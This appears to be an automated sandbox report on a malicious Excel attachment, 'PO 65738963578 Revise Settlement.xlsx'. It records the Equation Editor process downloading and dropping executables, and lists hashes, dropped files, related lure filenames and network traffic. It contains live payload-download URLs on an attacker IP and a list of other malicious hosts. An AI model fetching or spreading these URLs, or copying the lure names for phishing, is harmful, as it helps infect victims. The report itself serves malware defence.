Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@8/16@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 95% (good quality ratio 89.4%) Quality average: 83.1% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 42 Number of non-executed functions: 35
Cookbook Comments:	Found application associated with file extension: .xlsx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:42:40	API Interceptor	85x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.12.81.20	MV LADY FLORA 47K.xlsx	Get hash	malicious	Browse	198.12.81.20/scan9/SCAN9.exe
	MT 103 copy.xlsx	Get hash	malicious	Browse	198.12.81.20/copy6/COPY6.exe
	order P47 0082005924.xlsx	Get hash	malicious	Browse	198.12.81.20/LOADT/LOADT.exe
	Revised Order BUCKLE.xlsx	Get hash	malicious	Browse	198.12.81.20/book/BOOK.exe
	SOA 20220405 - 51731086.xlsx	Get hash	malicious	Browse	198.12.81.20/SCAN6/SCAN6.exe
	SEA FREIGHT IMPORT.xlsx	Get hash	malicious	Browse	198.12.81.20/sat5/SAT5.exe
	LPGC CIPTA DIAMOND.xlsx	Get hash	malicious	Browse	198.12.81.20/sat5/SAT5.exe
	Remittance Form.xlsx	Get hash	malicious	Browse	198.12.81.20/file4/FILE4.exe
	TT Application form.xlsx	Get hash	malicious	Browse	198.12.81.20/doc88/DOC88.exe
	doc.xls	Get hash	malicious	Browse	198.12.81.20/xloader/XLOADER.exe
	TT APPLICATION FORM.xlsx	Get hash	malicious	Browse	198.12.81.20/file4/FILE4.exe
	Quotation Req.xlsx	Get hash	malicious	Browse	198.12.81.20/xday/XDAY.exe
	Nichols PI.xlsx	Get hash	malicious	Browse	198.12.81.20/loadme/LOADME.exe
	Payment Advice SCB.xlsx	Get hash	malicious	Browse	198.12.81.20/loaderb/LOADERB.exe
	WAF MT Passion PL.xlsx	Get hash	malicious	Browse	198.12.81.20/hloader/HLOADER.exe
	NEWWAY SEA FREIGHT.xlsx	Get hash	malicious	Browse	198.12.81.20/qloader/QLOADER.exe
	WMC quote20022.4.xlsx	Get hash	malicious	Browse	198.12.81.20/vloader/VLOADER.exe
	BL MEDUMV037749.xlsx	Get hash	malicious	Browse	198.12.81.20/mloader/MLOADER.exe
	Invoice067.xlsx	Get hash	malicious	Browse	198.12.81.20/CLOADER/CLOADER.exe
	DHL7301062360.xlsx	Get hash	malicious	Browse	198.12.81.20/5LOADER/5LOADER.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	PO TO GIS #0890.xlsx	Get hash	malicious	Browse	107.175.218.31
	shipn_docs.xlsx	Get hash	malicious	Browse	192.3.152.135
	Order_List.xlsx	Get hash	malicious	Browse	104.168.33.12
	bank swiftcopy.xlsx	Get hash	malicious	Browse	198.12.91.249
	Paymentnotification115.xlsx	Get hash	malicious	Browse	192.3.121.203
	ORDER M52022.xlsx	Get hash	malicious	Browse	107.175.3.53
	Product_List.xlsx	Get hash	malicious	Browse	192.227.158.85
	Lawsuit-120522.xlsx	Get hash	malicious	Browse	104.168.33.121
	New order.xlsx	Get hash	malicious	Browse	104.168.33.25
	PO0975.xlsx	Get hash	malicious	Browse	172.245.120.113
	soa.xlsx	Get hash	malicious	Browse	172.245.27.27
	Bank Details.xlsx	Get hash	malicious	Browse	198.12.89.207
	43127-20220512.xlsx	Get hash	malicious	Browse	107.175.212.60
	http://192.227.158.85/god.exe	Get hash	malicious	Browse	192.227.158.85
	Statement.xlsx	Get hash	malicious	Browse	192.3.152.135
	MV LADY FLORA 47K.xlsx	Get hash	malicious	Browse	198.12.81.20
	MV PRIDE PACIFIC 2206N.xlsx	Get hash	malicious	Browse	107.172.93.57
	P O CSCL REF 1198.xlsx	Get hash	malicious	Browse	198.23.251.5
	SO-127.xlsx	Get hash	malicious	Browse	107.175.218.12
	remittance advice.xlsx	Get hash	malicious	Browse	198.12.89.207

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	255769
Entropy (8bit):	7.906288840175113
Encrypted:	false
SSDEEP:	6144:LOtIOtWQ/YWOXDYv0RgaJ1LULzHgpZQR7ZnbpEBb7TLwV1Azo:LOLtX/DOEMRgUa8M1cbfLwDj
MD5:	029BBE98A216416EB698CA543A5C0830
SHA1:	A24173F1DAF45D7444E3C698C3AE09A540A818DD
SHA-256:	E73B7DE772353638ADDD480041E90A67F27D8D5B087BF222B1C6649C54B9CC57
SHA-512:	684ACD7F2302C8DEAE1FC81EC9E5811588692BA0F8A080FE26A959DBDE8159BAFD4906684ADE4639051ABAF563B4438F8BD99B115AB5D668A845A4DE9D2830BC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://198.12.81.20/busy/BUSY.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF36CD9.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	5.125773446782967
Encrypted:	false
SSDEEP:	48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5:	30935B0D56A69E2E57355F8033ADF98B
SHA1:	5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256:	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512:	5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!......2...9...?...C...F...G...F...C...?...9...2......!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CBD0238.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	5.070400845866794
Encrypted:	false
SSDEEP:	96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5:	1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1:	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256:	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512:	3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................\|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D623D4F.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	5.125773446782967
Encrypted:	false
SSDEEP:	48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
MD5:	30935B0D56A69E2E57355F8033ADF98B
SHA1:	5F7C13E36023A1B3B3DAF030291C02631347C2AB
SHA-256:	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
SHA-512:	5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!......2...9...?...C...F...G...F...C...?...9...2......!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EBFD06.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ms-windows metafont .wmf
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	5.070400845866794
Encrypted:	false
SSDEEP:	96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
MD5:	1A4FF280B6D51A6ED16C3720AF1CD6EE
SHA1:	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
SHA-256:	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
SHA-512:	3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
Malicious:	false
Preview:	...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................\|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	223752
Entropy (8bit):	3.2805343869701504
Encrypted:	false
SSDEEP:	1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
MD5:	8E3A74F7AA420B02D34C69E625969C0A
SHA1:	4743F57F0F702C5B47FA1668D9173E08ADA16448
SHA-256:	0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
SHA-512:	ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
Malicious:	false
Preview:	....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bn5z71pvulub10vjar

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	167423
Entropy (8bit):	7.991030598002282
Encrypted:	true
SSDEEP:	3072:z1F74Q5ZD00MiVOYj9zJCzR9WNT6E2CA22/VG6QF574Br1q:z1FkqlVOUIzAZzaVGRGBr1q
MD5:	40FF96237005585BB3469F7844D579EA
SHA1:	CB38299275DA36B767A8EDD8AF4546CF0165B6D6
SHA-256:	81B2280B25F3F4BEF5A87D35291A9D6FD9D57E754FFDE05628663AC65F324257
SHA-512:	52E449F89A8F97696A96C98142D01AC9C34753DECFC24365AB0FBD820E54482C1C61A8A05E69D21D77F32099C831355EB24F5196BF3CCF91CE3A5F4383C64466
Malicious:	false
Preview:	....?.V....t...c...u.2.. ..l...q.&.m..3...%......E.~..#...u....x.P..g9..Xq.....pi..@.\|.6.}..&...J.7.'...^....K#.....D..tqv...<..AH99y........bH...]../.e.......U^..t....^.'d....>#....2.O.-...K..3N.7.:.Z/d.Q4.,.SZ....[..U`..I'.#....9.A......g~..C.?.V.h#..e.......-...ha.l......m..3.....%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?........'dk.L......k....-...d...TOy.".sd.Q4.,.,....H[......I.#x.....A.......g0..C.?.V....Ne...........ha.l...q.&.m..3...%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?.....^.'d.g....._...O.-...d...TOy.:./d.Q4.,.,....H[......I.#x.....A.......g0..C.?.V....Ne...........ha.l...q.&.m..3...%......E.~..........VP...Rx:,..T.1...v.?.5.e.F....$.y...z1....JZ...q.....D......x4....xj.u..Zl....z..I.u...Fl...e...R..J?.....^.'d.g....._...O.-..*.d...TOy.:./d.Q4.,.,....H[.

C:\Users\user\AppData\Local\Temp\dknqrab

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	5418
Entropy (8bit):	6.08058386157834
Encrypted:	false
SSDEEP:	96:v5fm8CsQMHXy2ZcUqP0PkvET4Ua36tHDp22n2CXn23PNYi7JArcUN9zB+v0QUe6S:hfQ03pQvESkHc22823PNMr/99+vh6S
MD5:	05102B10AF50DD080DF138356B05637D
SHA1:	BFB1ABB77EA1CE16E41D207C10FF31D6509558AB
SHA-256:	865D3959F838A6F4D41B9CF369C5863A10CD322A5F0410FD03A577890166D891
SHA-512:	2318CD339F1F65991D59A43E2C30368AA1DBEE674A8149D21DC5E56C8274CFA01AAEEBECC44043E82B6DA804F01DBDB05D4180115FC9073967C1F11CC7416BBE
Malicious:	false
Preview:	.....u..[..k.o[E..'o.`'+e.'o.`'+e.[E..e."...[E...U&.U.e.j.....e..u..U&.U.e.j.....e.u..U&.U.e.j....e..u..U&.U.e.j....e..u.[].p.D..C...e&..e..u..e[....e.m.e.m....Dy..e..u...e.o..E.[..D......[.>%..E..U.y.U.t.U....U..y.U.w.U.x..N...&....f.:[..U..U..t.e.'%.e..E.......>.;...[.>-.E.xw.e.wxs.&.u....'o.`'+e.e...e&K:.e..m.......u.e.e....m...e.u..&.b..W.L....b.....b`..W.z..........b-v.W.h..........u..[."'o.`'+e.e....e..e.[]..N.e...e...e.e...e.....%...N..e.D.yC...-..n-..e.D.y....-..n-.D.D..C...%.jb`..W.....j.....e..'.e.j.U..d...e.[]..N.[E....e.....e....u..[..'o.`'+e.e."...e..e.[]..N.e...e...e.e...e........'^....e.D.yC...-..n-..e&.D.y....-..n-..e.D.y...-..n-..e...D.tC...5..f5..e.D.y....-..n-.D%D..C...%.jb..W.....j.....e.[]..N.e.m.../.U..U..U.U&.U......e.[]..N.[E....e.....e....u..[.6.e.*...e..e.[]..N.e...e...e.e...e........N..e.D.yC...-..n-.e&.D.y....-..n-.D.D..C...%.jb-v.W.....j.....e..(.U&.U....

C:\Users\user\AppData\Local\Temp\idcqz.exe

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80384
Entropy (8bit):	6.294165791913379
Encrypted:	false
SSDEEP:	1536:jugTaC+v1eUfr0oxAomP3cX/4pi2sWjcdQQI:Na5UUD1/ui5QL
MD5:	51F62DEF6DC686B87CC0BAFC31685546
SHA1:	C99222ABD6547D34DED56B44CC5818675D902F07
SHA-256:	9E398BB06FD1CBF54E40BFB36211CBD5C73AF57E652603C9B6A37A70DAB5AF4D
SHA-512:	1D4933E4C6BA61833174819B34F59C266B2CFD5B4DA3ED36DD9C2FB8AC047EF0C76B4DE173432E1451D7CD3A489511EA4223B8941EF5FAED0EB09E7A921CBD76
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L....?~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nswAB85.tmp

Download File

Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	263211
Entropy (8bit):	7.569144130803792
Encrypted:	false
SSDEEP:	3072:i1F74Q5ZD00MiVOYj9zJCzR9WNT6E2CA22/VG6QF574Br1X7a5UUD1/ui5QL:i1FkqlVOUIzAZzaVGRGBr1QUQU
MD5:	6EFB91B44285F8050C8CBCC272E54FDB
SHA1:	2B6B1160680ACA8809287FE2D055BA30963A04EE
SHA-256:	54719DDAC4D092D918795FD291A01E1F03A203C49AE742D6077D201E2622BFE5
SHA-512:	8AB0FB7A8751E406E164DCB3DE836558D7A9ACD3EC18700BC580535C8EC61B16657C304BDB303D34639847FA8F3510DFA9EFC5F890B53807714C700A8267541D
Malicious:	false
Preview:	.&......,...................O...........(&.......&..........................................................................................................................................................................................................................................G...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF676A4AF24BE52768.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	95744
Entropy (8bit):	7.917920397581561
Encrypted:	false
SSDEEP:	1536:yXU9VxBJCTSeGZ2gbUh+WfVNjhqrBHKXplac20EUy:yX4nCTSedaUZtvqFHKecd
MD5:	E5C9C992C088A778A6348F4A58DD78D3
SHA1:	754F386DF06785DDD4CB4A04BED626CEAB65D5AB
SHA-256:	6B8FFB251308A2396F35780DF9376B329A6C741419DB44EA4F89D88ED932FBF2
SHA-512:	AD3AEB0EB38D9870289E91F385AC8490A94F9932033DF269F5BA9D2F0D5220A9228753F2ACAA3B16FA77B60FB6FAD4E6D385DA37C59B2ADCF770B04C9D03D601
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DF6A1E229B1B4407B7.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCE6EE0378A984A97.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEB8550F8DC457C8E.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	255769
Entropy (8bit):	7.906288840175113
Encrypted:	false
SSDEEP:	6144:LOtIOtWQ/YWOXDYv0RgaJ1LULzHgpZQR7ZnbpEBb7TLwV1Azo:LOLtX/DOEMRgUa8M1cbfLwDj
MD5:	029BBE98A216416EB698CA543A5C0830
SHA1:	A24173F1DAF45D7444E3C698C3AE09A540A818DD
SHA-256:	E73B7DE772353638ADDD480041E90A67F27D8D5B087BF222B1C6649C54B9CC57
SHA-512:	684ACD7F2302C8DEAE1FC81EC9E5811588692BA0F8A080FE26A959DBDE8159BAFD4906684ADE4639051ABAF563B4438F8BD99B115AB5D668A845A4DE9D2830BC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	CDFV2 Encrypted
Entropy (8bit):	7.917920397581561
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	PO 65738963578 Revise Settlement.xlsx
File size:	95744
MD5:	e5c9c992c088a778a6348f4a58dd78d3
SHA1:	754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256:	6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
SHA512:	ad3aeb0eb38d9870289e91f385ac8490a94f9932033df269f5ba9d2f0d5220a9228753f2acaa3b16fa77b60fb6fad4e6d385da37c59b2adcf770b04c9d03d601
SSDEEP:	1536:yXU9VxBJCTSeGZ2gbUh+WfVNjhqrBHKXplac20EUy:yX4nCTSedaUZtvqFHKecd
TLSH:	7C93F12EBE58CF14C62B52776C85D03D86986C02F5D2733B959CBE5A68B3CC08CA19F5
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 13, 2022 16:42:02.339994907 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.455461025 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.455568075 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.456495047 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.572757959 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.572815895 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.572864056 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.572873116 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.572896004 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.572926044 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.572926998 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.572988033 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573003054 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573048115 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573049068 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573088884 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573128939 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573137045 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573160887 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573177099 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573175907 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573216915 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.573220968 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.573256969 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.590251923 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687007904 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687072039 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687144041 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687154055 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687174082 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687196970 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687227964 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687237024 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687262058 CEST	49173	80	192.168.2.22	198.12.81.20
May 13, 2022 16:42:02.687279940 CEST	80	49173	198.12.81.20	192.168.2.22
May 13, 2022 16:42:02.687294006 CEST	49173	80	192.168.2.22	198.12.81.20
